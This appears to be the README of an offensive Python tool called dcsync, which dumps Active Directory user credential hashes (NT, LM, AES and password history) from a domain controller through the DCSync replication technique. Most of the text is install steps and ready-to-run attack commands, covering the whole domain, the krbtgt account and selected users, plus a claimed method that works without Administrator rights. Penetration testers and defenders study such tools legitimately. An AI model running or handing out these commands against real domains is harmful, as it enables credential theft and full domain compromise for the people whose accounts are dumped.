┓
┏┫┏┏┓┏┏┓┏
┗┻┗┛┗┫┛┗┗
┛
A python script for dumping domain users secrets using DCSync method.
You can install it from pypi (latest version is ) with this command:
sudo python3 -m pip install dcsync
OR from source :
git clone https://github.com/AetherBlack/DCSync
cd DCSync
python3 -m venv .
source bin/activate
python3 -m pip install .
OR with pipx :
python3 -m pipx install git+https://github.com/AetherBlack/DCSync/
- You want to DCSync the whole domain with Administrator privilegies :
dcsync $DOMAIN/$USER:"$PASSWORD"@$DC
- You want to DCSync for a single principal :
dcsync -just-user krbtgt -k $DOMAIN/$USER:"$PASSWORD"@$DC
- You want to DCSync the whole domain without Administrator privilegies using ldap method :
dcsync -method ldap $DOMAIN/$USER:"$PASSWORD"@$DC
You can use this methods :
samr (Default)
ldap
file
- You want to DCSync only a list of specific principals :
dcsync -just-user-file ./usersfile.txt $DOMAIN/$USER:"$PASSWORD"@$DC
The tool will use the provided method to enumerate the users of the domain. Then, it will connect to the DC's RPC to dump their NT hash, LM hash, AES hash and history hash.